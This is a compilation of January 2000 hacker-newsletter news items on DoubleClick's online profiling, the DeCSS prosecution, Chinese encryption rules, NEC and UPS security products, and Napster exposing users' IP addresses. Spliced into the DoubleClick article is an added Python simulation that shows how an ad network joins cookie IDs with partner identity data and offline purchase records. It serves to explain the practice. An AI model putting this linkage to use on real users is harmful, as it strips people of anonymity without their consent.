The BBC deploys vans equipped with oscillation detectors to residential neighborhoods to enforce the law. The vans track which homes are equipped with TV sets, and then check again to make sure that the residents have licenses for the TVs. "TV license enforcement is the main reason that women end up in prison in the UK," University of Cambridge cryptographer Ross Anderson wrote in an email. "The detector vans operate during the day, so when they find an unlicensed set and knock on the door, it's usually a woman who answers. A fine of 1,000 pounds is imposed, and if she can't pay it she goes to jail." What's more, Anderson and his colleagues have shown that the U.S. National Security Agency and others have long been able to use RF emissions to reconstruct what's on a computer monitor. But this invasive operation is a far cry from what Mobiltrak is doing, say some media business insiders. "I haven't met one person in the radio industry that's the least bit concerned about this from a privacy standpoint, as it currently exists," reports Ron Rodrigues, editor-in-chief of the trade magazine Radio & Records. Still, Rodrigues acknowledges, "We seem to be in a period when disclosure is becoming more important. With Mobiltrak, there may have to be some sort of disclosure that people are being monitored, like radar on the California highways." Schwartz, the Brooklyn law professor, believes something more than notification may be in order. "We can collect all this information in new ways. But who should get the benefits of this information?" he asks. "Is it like minerals on the deep sea bed outside the continental shelf, exploitable for whoever can get to it first? Or should we return some of the benefits in more direct ways to the people who created it?"
@HWA 56.0 HNN: Jan 26:DoubleClick Admits to Profiling of Surfers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Code Kid Internet Advertising Agency Doubleclick, has started to match up web surfing habits with actual names and addresses, according to USA Today. DoubleClick's recent acquisition of Abacus Direct Corp , a direct-marketing services company that maintains a database of names, addresses, telephone numbers and retail purchasing habits of 90% of American households has made this possible. By matching surfing habits with actual names and addresses Doubleclick is better able to target ads and offer 'personalized' service. The Electronic Privacy Information Center plans to file a complaint with the Federal Trade Commission by Feb. 16. USA Today http://www.usatoday.com/life/cyber/tech/cth211.htm C|Net http://news.cnet.com/news/0-1005-200-1531929.html?dtn.head USA Today; Activists charge DoubleClick double cross Web users have lost privacy with the drop of a cookie, they say By Will Rodger, USATODAY.com Say goodbye to anonymity on the Web. DoubleClick Inc., the Internet's largest advertising company, has begun tracking Web users by name and address as they move from one Web site to the next, USATODAY.com has learned. The practice, known as profiling, gives marketers the ability to know the household, and in many cases the precise identity, of the person visiting any one of the 11,500 sites that use DoubleClick's ad-tracking "cookies." What made such profiling possible was DoubleClick's purchase in June of Abacus Direct Corp., a direct-marketing services company that maintains a database of names, addresses and retail purchasing habits of 90% of American households. With the help of its online partners, DoubleClick can now correlate the Abacus database of names with people's Internet activities. Company spokeswoman Jennifer Blum said Tuesday that only about a dozen sites are participating now. 
But she acknowledged that DoubleClick would like all its partner sites to participate. DoubleClick defends the practice, insisting that it allows better targeting of online ads -- and thus makes consumers' online experiences at once more relevant and more profitable for advertisers. The company calls it "personalization." Consumer advocates have another term for it: privacy invasion. After being informed of DoubleClick's actions, several privacy activists said they would file a formal complaint with the Federal Trade Commission next month. "This is a blatant bait-and-switch trick," says Jason Catlett of Junkbusters Inc., an Internet-privacy consultancy. "For four years they have said (their services) don’t identify you personally, and now they're admitting they are going to identify you." To tie Doubleclick's "anonymous" records of your surfing habits to its Abacus database, it needs only the cooperation of another site that can identify you positively. Futuristic though that sounds, positive identification is actually simple. DoubleClick need only tie your cookie to another one placed by a site that ships you something through the mail, or one which requires registration. To do that: DoubleClick sends a cookie to your browser and gives it a unique ID number. Doubleclick sends the same ID number on to the site that knows who you are. That company then sends back the data that DoubleClick needs to look you up in the Abacus database. And voila -- DoubleClick knows who you are, too. The combination of DoubleClick's cookie-derived information -- more than 100 million files -- with Abacus' database on the purchasing habits of 90 million households means the vast majority of Web-connected Americans will likely lose their online anonymity, says David Banisar, deputy director of Privacy International. DoubleClick's Blum said she was not sure whether surfing habits tracked by DoubleClick before Abacus data are merged will be included in future profiles. 
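The four-step linkage the USA Today piece lays out (network sets a cookie with a unique ID; the ID is passed to a site that knows who you are; that site hands back identifying data; the data is looked up in the offline purchase database) is a join on a pseudonymous identifier, and it takes only one identified visit to label every earlier page view stored under that cookie. The following is an added simulation written for this issue, not DoubleClick's or Abacus's code; every site, person, ID and purchase record in it is constructed for illustration. It runs the join end to end and also shows what the user-side control, discarding the cookie, does and does not undo.

```python
"""Added example, not DoubleClick's or Abacus's code: a simulation of the
linkage the article describes, with an ad network that sets one pseudonymous
cookie per browser, a partner site that knows its registered users and hands
the network back a name and address for that cookie's ID, and an offline
purchase database keyed by name and address. Every site, person, ID and
purchase here is constructed for illustration."""
import secrets


class Browser:
    def __init__(self):
        self.cookies = {}


class AdNetwork:
    """Logs page views under a cookie ID; the ID is anonymous until a partner
    supplies the identity behind it."""

    def __init__(self):
        self.views = {}      # cookie id -> sites where this browser was served an ad
        self.identity = {}   # cookie id -> {"name", "address"} once a partner syncs it

    def serve_ad(self, browser, site):
        cid = browser.cookies.get("ad_id")
        if cid is None:
            cid = browser.cookies["ad_id"] = secrets.token_hex(8)
        self.views.setdefault(cid, []).append(site)
        return cid

    def sync(self, cid, partner_record):
        """The partner returns who is behind the ID it was handed."""
        self.identity[cid] = dict(partner_record)

    def profile(self, cid, offline_db):
        """Joins the click history with the offline purchase database by name/address."""
        ident = self.identity.get(cid)
        result = {"id": cid, "sites": list(self.views.get(cid, [])), "identity": ident}
        if ident is not None:
            result["catalog_purchases"] = offline_db.get((ident["name"], ident["address"]), [])
        return result


class PartnerSite:
    """A site that ships goods or requires registration, so it knows the visitor."""

    def __init__(self, name, network, users):
        self.name, self.network, self.users = name, network, users

    def visit(self, browser, logged_in_as=None):
        cid = self.network.serve_ad(browser, self.name)
        if logged_in_as is not None:
            self.network.sync(cid, self.users[logged_in_as])   # ID -> identity
        return cid


class PlainSite:
    """A content site in the network; knows nothing about the visitor."""

    def __init__(self, name, network):
        self.name, self.network = name, network

    def visit(self, browser):
        return self.network.serve_ad(browser, self.name)


# Constructed offline database: (name, address) -> catalog purchase history.
OFFLINE_DB = {("Jane Doe", "12 Fairway Ln"): ["sweater", "pants"]}


def run_scenario():
    """Returns (profile before the partner login, profile after it, profile of
    the fresh ID issued after the user clears cookies)."""
    net = AdNetwork()
    golf = PlainSite("golf-news.example", net)
    shop = PartnerSite("catalog-shop.example", net,
                       users={"jane": {"name": "Jane Doe", "address": "12 Fairway Ln"}})
    jane = Browser()
    cid = golf.visit(jane)
    golf.visit(jane)
    before = net.profile(cid, OFFLINE_DB)        # anonymous: only a history of sites
    shop.visit(jane, logged_in_as="jane")        # one identified visit labels it all
    after = net.profile(cid, OFFLINE_DB)
    jane.cookies.clear()                         # new ID; the old dossier stays labelled
    new_cid = golf.visit(jane)
    return before, after, net.profile(new_cid, OFFLINE_DB)


if __name__ == "__main__":
    for stage, prof in zip(("before", "after", "cleared"), run_scenario()):
        print(stage, prof)
```

Two points the run makes concrete: the link is retroactive, since the golf visits logged before the login are in the identified profile, and clearing the cookie only starts a new anonymous ID; it does not unlink what was already joined. The notice-and-opt-out disclosure the article discusses is a policy control on the partner side and is not modelled here.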
DoubleClick executives maintain they still give users who don't want to be tracked a chance to opt out. "That person will receive notice that their personal information is being gathered," DoubleClick Senior Vice President and Abacus unit chief Jonathan Shapiro says flatly. Yet, that chance to opt out comes only in the form of a few lines of text placed in the privacy policies of participating Web sites. Since those policies are often buried two or three levels down, online consumers will seldom know what is being done with their personal information in the first place, let alone that they may opt out, activists say. "That is not permission," Banisar says. "That is fraudulent on its face." Catlett, Banisar and the Electronic Privacy Information Center plan to file a complaint with the Federal Trade Commission by Feb. 16. They say they will charge that DoubleClick has duped consumers by suggesting the company's technology lets them remain anonymous. They expect to enlist a wide array of consumer groups to back their position. Further troubling to privacy advocates is DoubleClick's refusal to say which Internet sites are furnishing them the registration rolls that DoubleClick needs to link once-anonymous cookies to names, addresses, phone numbers and catalog purchases. "The fact that DoubleClick is not disclosing the names of the companies who are feeding them consumers' names is a shameful hypocrisy," Catlett says. "They are trying to protect the confidentiality of the violators of privacy." Shapiro Tuesday bristled at Catlett's characterization. Any company that uses data from the Abacus database to target Internet ads must disclose it online, he says. Moreover, he adds, DoubleClick itself would hand over to privacy advocates the list of participating companies if it could. But as in many lines of business, partners frown when their relationships are disclosed without their permission, he says. 
"If they all bought a billboard and said they work with us, that would be great," Shapiro says. The controversy over DoubleClick began last summer, when the company announced it was buying Abacus Direct in a deal valued at more than $1 billion. Privacy experts had feared that DoubleClick would begin merging the two databases at some point. But they say they were unaware that DoubleClick had begun its profiling practice late last year. Before its Abacus purchase, DoubleClick had made its money by targeting banner advertisements in less direct ways. DoubleClick ad-serving computers, for instance, check the Internet addresses of people who visit participating sites. Thus, people in their homes may see ads different from those seen by workers at General Motors, or a machine-tool company in Ohio. Every time viewers see or click on those banners, DoubleClick adds that fact to individual dossiers it builds on them with the help of the cookies it drops on users' hard drives. Those dossiers, in turn, help DoubleClick target ads more precisely still, increasing their relevance to consumers and reducing unnecessary repetition. Those cookies remained anonymous to DoubleClick until now. Being tracked as they move around the Web "doesn’t measure up to people's expectation on the Net," says Robert Smith, publisher of the newsletter Privacy Journal. "They don't think that their physical locations, their names will be combined with what they do on the Internet. If they (DoubleClick) want to do that they have to expose that plan to the public and have it discussed." -=- CNET: Privacy fears raised by DoubleClick database plans By Courtney Macavinta Staff Writer, CNET News.com January 25, 2000, 8:10 p.m. PT Having sealed its purchase of a direct marketing company, DoubleClick has begun signing up sites to create a network that will tie Web surfers' travels with their personal information and shopping habits--online and off. 
The leading Web advertising company plans to build a database of consumer profiles that will include each user's "name, address, retail, catalog and online purchase histories, and demographic data," according to the company's new privacy policy. The database, which the company says will only be seen by DoubleClick, is intended to help members of its budding, U.S.-based Abacus Alliance perfect their target marketing. The move comes a little over a month after New York-based DoubleClick completed its $1.7 billion acquisition of Abacus Direct and in the wake of the Federal Trade Commission's November probe on the growing trend of online profiling. Privacy advocates, who protested the deal from the start, have unsuccessfully tried to get the FTC to review the implications of the merger because they say it means one thing for consumers: less privacy. Until recently, DoubleClick's policy was to not correlate personal information with its 100 million cookies, which are scattered worldwide. But the new database will rely on the cookies, which the company places on Net users' computers to record surfing habits and display pertinent advertising. Net users aren't informed when they are given a DoubleClick cookie unless their browser is preset to do so, but they can "opt out" through the company's Web site. The more than 11,500 sites that belong to DoubleClick's network could feed into the new database, which will correlate with the personal information in Abacus' existing database of more than 2 billion consumer catalog transactions. The rollout was first reported by USA Today. DoubleClick says that not all of the sites using its ad technology will join the alliance. "They have to somehow have something to give to be a member of this," said Jennifer Blum, DoubleClick's spokeswoman. 
The new database works like this: In the past, if a person named Jane Doe had a DoubleClick cookie that detected that she loved golf-related sites, the company could show her ads for sports-related content. But in the future, if the same surfer gives personal information to a member of the Abacus Alliance, DoubleClick will know a lot more about her: that her name is Jane Doe, and that she used to buy sweaters and pants via Company X's catalog but hasn't done so for years. However, Jane did buy a coat online last month. Now DoubleClick can advise Company X to target Jane with Net ads instead of sending her a catalog. "Yes, of course this will be done," Blum said. "The goal here is to match up the information." DoubleClick says that the focus of the alliance is to eliminate junk mail and to give consumers information about products they want. But privacy advocates charge that the combined companies are finally acting on their potential to create one of the most extensive consumer profiles ever. "Privacy advocates have been saying for years that marketers will turn the Net into a gigantic data-gathering machine for junk mail, telemarketing and advertising; now that machine is working," said Jason Catlett, founder of Junkbusters, a clearinghouse for privacy-protection measures. DoubleClick contends that before members of the Abacus Alliance put information into the new database, they must inform consumers. "Going forward, when a consumer puts in personal information to a Web site that is a member of this alliance, they will be told that the information will be shared with other parties," Blum said. "Consumers are given notice and choice if they want to opt out." Blum said that once companies join the alliance they also must give Net users notice that their information is going to be shared--even if that person has shared information with the Web site before. 
But privacy watchdogs say an opt-out policy is not fair to consumers who may not realize that when a company says their information is being shared with a "third party," it's really the potentially enormous DoubleClick database. "DoubleClick is trying to characterize this as choice, but its practice is based on opt out, not opt in," Catlett said. "We said this would happen-- behold it quietly has."

@HWA

57.0 HNN: Jan 26: Support for DeCSS Author Grows
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Gee the EFF is supporting this case? i'm amazed. - Ed

From HNN http://www.hackernews.com/

contributed by Jan and Zorro

Support for Jon Johansen, the 16 year old Norwegian author being persecuted by the MPA, is growing. Johansen and his father were arrested and their computer equipment confiscated yesterday. They were charged with violation of copyright laws.

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2427192,00.html?chkpt=zdnntop

C|Net
http://news.cnet.com/news/0-1005-200-1531192.html?tag=st.ne.ron.lthd.1005-200-1531192

Wired
http://www.wired.com/news/business/0,1367,33889,00.html

CNN
http://cnn.com/2000/TECH/ptech/01/25/dvd.charge/index.html

Aftenposten - English version
http://www.aftenposten.no/english/local/d121315.htm

Electronic Frontier Foundation
http://www.eff.org/IP/Video/DeCSS_prosecutions/Johansen_DeCSS_case/20000125_eff_johansen_case_pressrel.html

ZDNet;

--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

DVD hacker arrested in Norway
By Reuters
January 25, 2000 11:30 AM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2427192,00.html?chkpt=zdnntop

A Norwegian teenager has been charged with distributing a software program that enables users to make unauthorized copies of DVD movies, police said on Tuesday.
Jon Johansen is thought to have developed a program "that breaks the entire copyright protection of the DVD (digital versatile disc) system," said Inger Marie Sunde, a senior public prosecutor at Norway's economic crime unit. "He is charged with breaking intellectual property laws," said Sunde. Johansen's father was also charged in the case, since the teen posted the source code on a Web site owned by his father.

Johansen refuted the charges in a CNN Norway article, saying that he has done nothing wrong. The 16-year-old student stressed that the program he and others on the Internet created was only meant for playing DVDs on computers running the Linux operating system. Previously, when the movie industry contacted him and asked him to remove the source code, he complied so as to avoid a lawsuit. Despite his cooperation, the movie industry is suing anyway.

Major Hollywood studios, which use an encryption scheme on their DVDs to prevent unauthorized copying, have already taken legal action against three people in the United States who displayed Johansen's program on their Web sites.

Computer equipment confiscated

His program, known as DeCSS, is thought to have been the first program posted to the Internet that resulted from reverse engineering the DVD copy protection system. Norwegian law firm Simonsen Musaeus said in a statement it had reported Johansen and his father, Per Johansen, to the police earlier this month on behalf of the Motion Picture Association (MPA), a lobby group for seven major Hollywood studios.

Sunde told Reuters police had questioned Jon Johansen late on Monday, searched his home and confiscated computer equipment. "He is a suspect, and we found that there were reasonable grounds for a search," she added. Other sites reported that two computers, a cell phone and some CDs had been taken by police. In addition, Johansen had to inform police of all his passwords.

Simonsen Musaeus acts on behalf of U.S.
license agency DVD Copy Control Association and the MPA, which represents major Hollywood studios such as Sony's Sony Pictures Entertainment Inc., Seagram Co. unit Universal Studios Inc. and Warner Bros., a Time Warner Inc. (NYSE: TWX) unit. A U.S. district court in New York on Friday ordered three people to remove Johansen's DeCSS program from their Web sites after the MPA filed a complaint.

DVDs store sound and pictures digitally on an optical disc with a storage capacity considerably greater than that of a regular CD-ROM.

-=-

CNET;

Teen charged in connection with DVD cracking tool
By Courtney Macavinta
Staff Writer, CNET News.com
January 25, 2000, 5:00 p.m. PT

update Norwegian police questioned and charged a 16-year-old student who sent the U.S. movie industry into a frenzy when he helped create a program that breaks the encryption on DVDs that spread like wildfire on the Net.

In an interview today, Jon Johansen said that police raided his house yesterday to collect evidence stemming from allegations that he violated trade secrets to create a program called DeCSS, which cracks the security code in the DVD Content Scrambling System. That, in turn, allows people to view digital movies through unauthorized players, such as computers running the Linux operating system.

Police seized several computers, a Nokia cellular phone and some CDs and then charged Johansen with breaking security to gain unauthorized access to data or software. He and his father, whose company's Web site was used to post the program, also were charged with copyright infringement. The son and father face two to three years in prison and fines if convicted.

Johansen said that several people developed the program to allow users to play DVDs on various PCs. The effort is described on OpenDVD.org. "Our goal was to make it possible to watch DVDs under the Linux operating system," Johansen wrote in an email.
In the wake of the release of DeCSS, the film industry has vigorously tried to stamp out the program. The Motion Picture Association of America (MPAA) filed a lawsuit in New York against individuals who allegedly posted the program on their Web sites; the organization also is a founder of the DVD Copy Control Association, which filed a similar lawsuit in California. The judges in both cases have issued preliminary injunctions prohibiting the defendants from posting the code through the duration of the trials.

But Johansen argues that the MPAA has misled the public into believing that his program allows people to more easily copy DVDs. "The (motion picture industry) is claiming that their encryption was copy protection," he said. "The encryption is in fact only playback protection, which gives the movie industry a monopoly on who gets to make DVD players."

The Electronic Frontier Foundation, which is defending the parties in both cases, argues that people have a right to discuss the "the technical insecurity of DVD" and demonstrate their points through reverse engineering. The DVD association was formed in December of last year by companies that also are members of the MPAA, the Business Software Alliance and the Electronic Industries Alliance to license out the DVD Content Scrambling System.

-=-

Aftenposten;

(NO response from host at print time)

-=-

EFF;

FOR IMMEDIATE RELEASE
January 25, 2000

Norwegian Teen Becomes Industry's Latest Test Case
Motion Picture Industry Continues Campaign Against Open Source Software Community Over DVD Security

San Francisco -- The home of a Norwegian teenager was raided by the police today acting at the behest of the motion picture industry intent on suppressing discussion and distribution of DVD-viewing software developed outside of industry's monopoly on such software.
This action follows closely three lawsuits filed by the industry in California, New York, and Connecticut against numerous individuals and organizations including coders, journalists, an ISP, and numerous Netizens. "The motion picture industry is using its substantial resources to intimidate the technical community into surrendering rights of free expression and fair use of information," said Tara Lemmey, Executive Director of the Electronic Frontier Foundation. "These actions are a wake-up call for the technical community. The process of reverse-engineering and public posting and commenting of code that the MPAA is attempting to suppress is fundamental to the development of commercial and open source software." Sixteen-year-old Jon Johansen, who was among the first to post the DeCSS program that allows users to view DVDs on computers not using Windows or Macintosh operating systems, had his computer and cellular telephone seized by police. Both he and his father were questioned at length by the police and have been threatened with indictment for posting the code, which the motion picture industry claims was illegally created. According to several international legal experts contacted by EFF, the industry is relying on untested legal theory in its case against Johansen. With regard to the industry's use of Norwegian Criminal Code sect 145(2), a provision making it illegal to "break a security arrangement" to access data, experts agree that it is not clear whether it can apply to a situation where someone breaks a security system to access material on a device of which that person is the owner. The second charge of contributory copyright infringement, as likely to be argued in this case, has also not been before the Norwegian courts. The actions being brought by the motion picture industry have attracted the attention of the Global Internet Liberty Campaign (GILC), a coalition of over 50 international civil liberties and human rights groups. 
"We believe that intellectual property owners should not be allowed to expand their property rights at the expense of free speech, legal reverse-engineering of software programs for interoperability reasons, and discussions of technical and scientific issues on the Internet," wrote GILC members in a statement released last week. "DVD-CCA's lawsuit is in direct conflict with United Nations human rights accords and the First Amendment of the United States Constitution." (EFF is a GILC member.) EFF will continue fighting the industry's attempts to censor Web sites discussing DVD technology, including assisting Johansen and his family in finding legal representation in Norway. All of these steps are part of EFF's Campaign for Audiovisual Free Expression (CAFE), which it launched last summer to address complex societal and legal issues raised by new technological measures for protecting intellectual property rights. For complete information on the MPAA and DVD-CCA cases, see: http://www.eff.org/IP/Video To learn more about EFF's Campaign for Audiovisual Free Expression, see: http://www.eff.org/cafe For information on the Global Internet Liberty Campaign, see: http://www.gilc.org The Electronic Frontier Foundation ( http://www.eff.org ) is a leading global nonprofit organization linking technical architectures with legal frameworks to support the rights of individuals in an open society. Founded in 1990, EFF actively encourages and challenges industry and government to support free expression, privacy, and openness in the information society. EFF is a member-supported organization and maintains one of the most-linked-to Web sites in the world. 
[end]

@HWA

58.0 HNN: Jan 26: China To Require Crypto Registration
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

Starting next Monday Chinese government officials will require that all businesses operating within China must register the type of commercial encryption software they use. The regulations also bar Chinese companies from buying products containing foreign-designed encryption software.

US National Newspaper - via Cryptome
http://cryptome.org/cn-crypto.htm

25 January 2000. Thanks to Anonymous.

Source: US national newspaper, January 25, 2000

Foreigners Must Disclose Internet Secrets to Beijing Soon
Encryption Rules For Firms Threaten Growth of the Web

By MATT FORNEY

BEIJING -- The Chinese government is about to require foreign firms to reveal one of their deepest secrets -- the type of software used to protect sensitive data transfers over the Internet.

By next Monday, foreign and Chinese companies must register the type of commercial encryption software they use. Such software makes it more difficult for hackers -- or governments -- to eavesdrop on electronic messages. Eventually, the companies must provide details of employees who use the software, making it easier for authorities to monitor personal and commercial use of the Internet.

In addition, the regulations bar Chinese companies from buying products containing foreign-designed encryption software. A strict interpretation would include such products as Netscape browsers or Microsoft Outlook, as well as the more complex equipment vital for conducting business securely over the Internet.

The rules are the latest sign of Beijing's unease with the Internet, which has been used by dissidents and members of the banned sect Falun Dafa to communicate and spread information. Authorities have tried to block sites and require users to register, but the number of users continues to rise and now totals about nine million.
The new rules, however, could slow the Internet's growth here. If companies offering electronic business services worry that the Chinese government is monitoring their transmissions, they could relocate outside China's borders, where they wouldn't have to reveal the type of encryption software they use.

"This is sending the wrong message to foreign investors," says Patrick Powers, director of China operations for the U.S.-China Business Council, who adds that "the foreign business community is deeply concerned." So is the U.S. government, which recently approved the export of many types of encryption software. Commerce Secretary William Daley plans to raise the issue with senior Chinese officials this week in Switzerland during the annual World Economic Forum.

China revealed the new regulations on Oct. 15, in an order published in the Communist Party's flagship newspaper, the People's Daily. It demanded that "foreign organizations or individuals using encryption products or equipment containing encryption technology in China must apply" for permission by Jan. 31. It exempted diplomatic missions.

After meeting that application deadline, foreign companies must fill out a second round of paperwork. According to a copy of the forms, companies must name employees who are using encryption software and give the location of the computers they use, as well as their e-mail addresses and telephone numbers. The order adds that "no organization or individual can sell foreign commercial encryption products."

If enforced, the regulations would certainly complicate the development of the Internet in China. Most of the routers and servers that compose the nerve center of China's networks come from foreign companies, and often include encrypted software to ensure secure communications. The rules could force delays in network construction as Chinese software companies struggle to expand their encryption services.

"If IBM or Hewlett-Packard wants to sell an e-commerce Web server to China, it might have to isolate which parts relate to security" and then find Chinese companies to write the software, says Jay Hu, director of the Beijing branch of the U.S. Information Technology Office, an industry research group. "I don't think Chinese companies have that ability." Neither International Business Machines Corp. nor Hewlett Packard Co. would comment.

The encryption regulations could apply to just about anything that transmits sensitive digital information, including cell phones, Internet browsers and e-mail software. Microsoft's Outlook program uses low-level encryption, and the company might have to seek Chinese partners to design it anew. Alick Yan, a spokesman for Microsoft (China) Co., said it's too early to gauge the potential impact.

The government has created a new agency to enforce the regulations, but it isn't clear who controls the body. "We report to the State Council," which is China's cabinet, explained director Yang Lingjun, who declined to comment further. However, many foreign-company officials, speaking anonymously, say they're afraid the organization is staffed by the Ministry of State Security, China's secret police.

@HWA

59.0 HNN: Jan 26: NEC Develops Network Encryption Technology
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Code Kid

NEC Corp said on Wednesday it developed a new encryption technology to protect data on the Internet and other networks. The new technology, Cipherunicorn-A, creates several false keys in addition to the true encryption key, making it especially difficult for potential intruders to crack.
Reuters - via Yahoo

Wednesday January 26, 5:43 am Eastern Time

NEC develops encryption technology for networks

TOKYO, Jan 26 (Reuters) - NEC Corp said on Wednesday it developed a new encryption technology to prevent hackers from tapping into business-to-consumer exchanges on the Internet and other networks.

The new technology, Cipherunicorn-A, creates several false keys in addition to the true encryption key, making it especially difficult for potential intruders to crack, NEC said.

The technology also features a dynamic encryption code that can use key lengths of 128, 192 or 256 bits, offering higher levels of security than conventional methods with a fixed length of 128 bits, an NEC spokesman said.

The electronics maker aims to develop software utilising the new technology as soon as possible, he said, although he gave no specific time frame.

Worries about Internet hackers were heightened in Japan this week after humiliating raids on government Web sites, in which hackers linked one to a pornographic site and attacked the nation's war record on another.

@HWA

60.0 HNN: Jan 26: UPS announces Worldtalk secure email.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Evil Wench

From HNN http://www.hackernews.com/

UPS has announced the launch of Worldtalk, a product aimed at securing corporate e-mail while in transit. It also claims to block SPAM and Viruses. UPS is offering companies up to $100,000 for business losses as part of its customer assurance plan when using UPS Document Exchange. (There is so much hype and marketing fluff in this press release it is hard to pick out the facts. On the surface this looks like nothing more than a glorified SSL package.)

United Parcel Service
http://www.ups.com/bin/shownews.cgi?20000124badnews

Bad News for Hackers, Crackers
Worldtalk, UPS Combine Powerful Security Solutions to Safeguard Critical Information

SANTA CLARA, Calif. and ATLANTA, Ga., Jan.
24, 2000 -- Worldtalk and UPS today announced the launch of a cutting edge security product combining industry-leading solutions to protect critical business information on a company's Web site or in transit via e-mail. The new product, WorldSecure/Mail for UPS OnLine Courier, integrates Worldtalk's award-winning WorldSecure products with UPS Document Exchange for a lethal one-two punch against hackers or crackers looking to gain access to confidential information on the Web. Worldtalk's award-winning WorldSecure products, based on the WorldSecure policy management platform, enable organizations to define and enforce content security policies for e-mail and the Web. Worldtalk's products provide organizations with the ability to reduce corporate liability, secure intellectual property, guarantee confidentiality of communications with trading partners and protect network resources. WorldSecure/Mail ensures the confidentiality and privacy of Internet communication, protects information assets, and blocks viruses and SPAMs. UPS Document Exchange guards sensitive information in transit between one organization's server and another's. Armed with 128-bit encryption on the server and optional password protection, UPS Document Exchange offers secure, trackable electronic delivery of anything that can be contained in a digital file, including documents, images and software, along with definitive proof of delivery. Combined, the two products allow an organization to establish criteria by which specific types of sensitive documents or information can leave its network only via UPS Document Exchange - and are automatically converted into a secure UPS Document Exchange digital package before sending. Meanwhile other, less sensitive information can still be sent by conventional e-mail. Both companies will sell the integrated solution. 
As an added security measure, UPS is putting its money where its mouth is by offering companies up to $100,000 for business losses as part of its customer assurance plan when using UPS Document Exchange.

Solutions that protect the security of sensitive documents become even more important as businesses communicate more frequently over the Internet. By the year 2001, 35 percent of business documents - 21 million per day - will move via the Internet, according to the Aberdeen Group.

"With the combination of WorldSecure and UPS Document Exchange, organizations can ensure their sensitive documents won't be floating around unprotected in the wildly unsecure world of e-mail," said Kim Marchner, Group Manager for UPS Document Exchange Marketing. "An organization has the power to define which types of documents - like prospectuses or confidential reports from its legal department - will be required to carry the protection of Document Exchange when leaving the server."

An important feature of UPS Document Exchange is its ease of use by both sender and receiver. Unlike unwieldy encryption programs that require the sender and recipient to have the same type of encryption software, Document Exchange requires only that the sender have a standard e-mail package, and the receiver have a standard Web browser.

"Organizations want to leverage the economy, efficiency and ubiquity of Internet e-mail," said Jim Heisch, President and CFO, Worldtalk. "Solutions like WorldSecure/Mail and UPS Document Exchange allow them to simply and efficiently define and enforce policies that ensure the safe use of their e-mail systems."

UPS Document Exchange, launched in June 1998, is a secure Internet communications service for business-to-business commerce based on Tumbleweed Communication Corp.'s Integrated Messaging Exchange (IME) technology.
Tumbleweed Integrated Messaging Exchange (IME) is a set of products and services that leverage the Internet and existing e-mail to create a secure, trackable online communications channel. Thousands of businesses are currently using UPS Document Exchange to securely move critical documents, images and software over the 'Net. About Worldtalk Worldtalk Corporation is a leading provider of policy enforcement solutions for e-mail and Web communications. The company's WorldSecure policy management platform complements existing firewalls by enabling organizations to enforce usage policies for all Internet e-mail and Web communications. Worldtalk delivered the industry's first integrated solution for managing and enforcing e-mail security policies in September 1997. Since then, organizations have purchased WorldSecure solutions to ensure confidentiality of their external e-mail communications, protect their intellectual property, prevent SPAMs and viruses, and reduce the legal liabilities associated with Internet communications. Worldtalk products include WorldSecure/Web and the award-winning WorldSecure/Mail (previously known as WorldSecure Server), which are marketed and sold worldwide by Worldtalk, Value Added Resellers (VARs) and distributors. For more information, please visit us at http://www.worldtalk.com. About UPS United Parcel Service, the world's largest express carrier and package delivery company, is a leading commerce facilitator, offering an unmatched array of traditional and electronic commerce services. By offering fully integrated, web-enabled business-to-business solutions and working with other e-commerce leaders, UPS is changing the way people do business. The company has won numerous awards for its Web site and information technology infrastructure, including two Computerworld Smithsonian Awards. The Atlanta-based company operates in more than 200 countries and employs more than 330,000 people worldwide. 
UPS reported 1998 annual revenues of $24.8 billion. You can visit the UPS web site at www.ups.com.

For more information, contact:

Angela McMahon - UPS - 404-828-6840 amcmahon@ups.com
Shannon Hakesley - Worldtalk - 408-567-5141 shannon.hakesley@worldtalk.com

@HWA

61.0 HNN: Jan 27: Napster Reveals Users Info
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This seems like a very convenient and timely accident, I wonder if it wasn't engineered or leaked. This is the reason I didn't register with napster and haven't used it. Trust no one. - Ed

From HNN http://www.hackernews.com/

contributed by acopalyse

The popular MP3 trading software, Napster, may have a security hole. Internet security consultant Richard Smith, has found that Napster logs users' IP numbers. This information could be used to help copyright owners identify and try to prosecute Napster users who may be illegally trading music files.

C|Net
http://news.cnet.com/news/0-1005-200-1532962.html?tag=st.ne.1002.bgif?st.ne.fd.gif.j

(BTW this link looks wacked out but it is legit - Ed)

Security problem discovered in Napster music software
By Paul Festa
Staff Writer, CNET News.com
January 26, 2000, 3:30 p.m. PT

Those who use Napster's popular software for trading digital music files may not be as anonymous as they think they are.

Napster's program, which lets users see which digital music files other users possess, also exposes their Internet Protocol addresses, according to Internet security consultant Richard Smith. IP addresses are unique strings of numbers that identify users' computers on the Internet. That could help copyright owners identify and try to prosecute Napster users who may be illegally swapping music.

"Napster has a problem," he said. "It's serious in the sense that they have exposed their users to legal risk."
Napster acknowledged the problem but minimized its importance, saying that IP addresses are not easily procurable except by experienced network experts or hackers, and that individual IP addresses are more often than not obscured behind corporate or Internet service provider firewalls and proxy servers.

"With our product, when you transfer from point to point, the IP address is available to you," said Eddie Kessler, Napster's vice president of engineering. "It's something that a hacker might have access to. In most cases, tracing an individual user would not be possible, but it is possible."

Smith noted that IP addresses are traceable to individuals about a third of the time.

Napster said it is working on hiding its users' IP addresses. "We're evaluating various technologies that would provide an even higher level of security to our users," Kessler said. "Specifically, they would not make your IP address visible to the person who was downloading content to you." Kessler would not say when the company expects to implement those changes.

